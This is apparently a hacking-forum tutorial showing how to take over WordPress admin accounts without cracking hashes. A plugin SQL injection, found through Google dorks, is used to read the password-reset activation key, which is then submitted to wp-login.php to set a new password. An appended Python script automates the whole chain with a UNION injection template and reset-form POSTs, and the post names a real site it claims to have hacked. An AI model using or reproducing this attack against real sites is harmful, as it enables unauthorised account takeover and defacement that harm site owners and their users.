Hacking Wordpress Without Hash Cracking

The title says it all: I am going to show you how to hack a WordPress site without cracking the password hashes. This works with any of the WordPress SQL injection exploits ever published for its themes or plugins, as long as the injection lets you read the wp_users table, because what we need from the database is a readable password-reset key, not a crackable hash.
Point to remember:
You cannot exploit the latest version of WordPress with this. That is 3.4.2, released on 6 September 2012 (yes, you heard right, released this month). There are still tons of websites out there which haven't been updated yet, and all the previous versions can be exploited using this method.
Things you need:
1) Any WordPress SQL injection dork (you can get one from exploit-db.com).
2) Knowledge of SQL injection (because this thread is not about SQL injection).
3) My help .. hehe

1) My Dork

There are a number of SQL injection exploits in different plugins and themes of WordPress. The exploit I'm picking is in one of the plugins, called Wp-FacebookConnect,
and the Google dork for it is:

Now paste this into google.com (one of my best friends) and you will see a number of vulnerable websites.
2) Now the website I'm going to use here is:

Here the parameter userid is vulnerable to SQL injection, so let's see what we can get from the database. I'm going to change the above URL to this:

Now you can see we got the username together with the e-mail address.
If I change the above URL to this:

I get the username and the hashed password.
Point to be noted here: I'm using concat; you can also use group_concat to pull all the users in one go. How you drive the injection is up to your own SQL injection knowledge.
Now we all know that WordPress hashes belong to the category cracking tools call MD5(WordPress), the salted, iterated phpass "$P$" hashes, which are different from plain MD5 and very slow to crack. But if you're mad, you should think outside the box.
So now follow the steps:
a) Go to the login page (wp-login.php) of the WordPress site. In my case that would be:
b) Click on "Lost your password?"
c) WordPress will now ask for the username or e-mail of the account whose password you want to reset. In my case that is 'masaru', so go ahead and enter the username.

d) Now look closely: it says "Check your e-mail for the confirmation link."
e) What WordPress actually does is generate an activation key, e-mail a reset link containing it to that user's address, and store the same key in the database (the user_activation_key column of wp_users). All you have to do is read that key with the injection.
f) So now I change my URL to this to get the activation key:

And you can see we got the activation key. Note it down somewhere.
g) Finally, all we have to do is reset the password without ever touching the e-mail account. For that I add this to my URL:
wp-login.php?action=rp&key=KEYHERE&login=USER NAME HERE

I replace KEYHERE with the activation key I got and USER NAME HERE with the username, which in my case is 'masaru', so my URL will be:

WordPress will ask you for a new password.
Enter it, go to the login page again, log in with the new password, and there you go: you have access to the admin panel.
Now, to check quickly whether a website is using the latest version 3.4.2 or a previous version: go to the login page and see whether there is a link back to the main page of the blog (in my case the link reads "-- Back to Digital Way of Living"). If the link is there, it is not 3.4.2; if you don't see it, it is 3.4.2. This trick is not an official check, just something I figured out that has been working for me. A more reliable check is the generator tag in the front page source (<meta name="generator" content="WordPress 3.4.2" />) or the site's /readme.html, which prints the version, unless the site owner has removed them.
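The whole chain from steps a) to g), plus the version check, written out as a script. This is an added example and not code from the original post or from WordPress. Everything target-specific is an assumption: BASE_URL, TARGET_LOGIN, the injection URL template (the vulnerable plugin endpoint, its column count and the exact UNION payload are not reproduced from the post, so the template is a hypothetical placeholder) and the "::" markers used to pick the key out of the page. The only real parts are the wp-users column names (user_login, user_pass, user_activation_key) and the WordPress 3.x wp-login.php actions and form fields (lostpassword with user_login, rp/resetpass with pass1 and pass2).

```python
"""Added example (not from the original post): the reset-key chain as a script.

Target-specific values below are assumptions. The wp-login.php actions and
form fields are the real WordPress 3.x ones; the injection endpoint is a
hypothetical placeholder for whatever SQL injection you have.
"""
import re
import urllib.parse
import urllib.request
from typing import Optional

# Assumed target (hypothetical); use only against a site you are authorised to test.
BASE_URL = "http://example.com/wordpress"
TARGET_LOGIN = "masaru"

# Hypothetical injection URL: the vulnerable parameter is `userid`, and the
# UNION payload wraps the wanted column in 0x3a3a ("::") so it can be found
# in the page. The real endpoint and column count depend on the plugin.
INJECTION_TEMPLATE = (
    BASE_URL + "/wp-content/plugins/VULNERABLE_PLUGIN/page.php?userid=-1+UNION+SELECT+"
    "concat(0x3a3a,{column},0x3a3a)+FROM+wp_users+WHERE+user_login=0x{login_hex}--+-"
)
MARKER = "::"


def injection_url(column: str, login: str = TARGET_LOGIN) -> str:
    """Build the injection URL that reads one wp_users column for one login."""
    return INJECTION_TEMPLATE.format(column=column, login_hex=login.encode().hex())


def parse_marked_value(html: str, marker: str = MARKER) -> Optional[str]:
    """Return the text between the first pair of markers, or None if absent."""
    m = re.search(re.escape(marker) + r"(.*?)" + re.escape(marker), html, re.S)
    return m.group(1) if m else None


def reset_url(base: str, key: str, login: str) -> str:
    """The wp-login.php?action=rp link the reset e-mail would have contained."""
    query = urllib.parse.urlencode({"action": "rp", "key": key, "login": login})
    return f"{base}/wp-login.php?{query}"


def parse_wp_version(html: str) -> Optional[str]:
    """Version from the generator meta tag or from readme.html ('Version 3.4.2')."""
    m = re.search(r'name="generator" content="WordPress ([\d.]+)"', html)
    if not m:
        m = re.search(r"Version\s+(\d+(?:\.\d+)+)", html)
    return m.group(1) if m else None


def is_patched(version: str) -> bool:
    """The post's claim: 3.4.2 and later cannot be exploited this way."""
    return tuple(int(p) for p in version.split(".")) >= (3, 4, 2)


def _post(url: str, fields: dict) -> str:
    data = urllib.parse.urlencode(fields).encode()
    with urllib.request.urlopen(urllib.request.Request(url, data=data)) as r:
        return r.read().decode(errors="replace")


def _get(url: str) -> str:
    with urllib.request.urlopen(url) as r:
        return r.read().decode(errors="replace")


def run_chain(new_password: str) -> str:
    """Network steps a) to g) from the post; needs a reachable, authorised target."""
    version = parse_wp_version(_get(f"{BASE_URL}/readme.html"))
    if version and is_patched(version):
        raise RuntimeError(f"WordPress {version}: the post says this is not exploitable")
    # a)-d): submit 'Lost your password?', which makes WordPress store a fresh key.
    _post(f"{BASE_URL}/wp-login.php?action=lostpassword",
          {"user_login": TARGET_LOGIN, "wp-submit": "Get New Password"})
    # e)-f): read user_activation_key through the injection instead of the mailbox.
    key = parse_marked_value(_get(injection_url("user_activation_key")))
    if not key:
        raise RuntimeError("activation key not found; is a reset pending?")
    # g): submit the same form the e-mail link leads to, with the new password.
    _post(f"{BASE_URL}/wp-login.php?action=resetpass&"
          + urllib.parse.urlencode({"key": key, "login": TARGET_LOGIN}),
          {"pass1": new_password, "pass2": new_password, "wp-submit": "Reset Password"})
    return key


if __name__ == "__main__":
    print(injection_url("user_activation_key"))
    print(reset_url(BASE_URL, "KEYHERE", TARGET_LOGIN))
```

The network steps are kept in run_chain so the pure helpers (URL building, key and version parsing) can be checked offline. One caveat worth knowing when reading this today: from WordPress 4.3 onwards the user_activation_key column stores a timestamp plus a phpass hash of the key that goes into the e-mail, so reading the column no longer gives you a usable reset link; this post predates that change.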
Hope you like this. :)
Hacked WordPress site : http://standzahra.id1945.com/

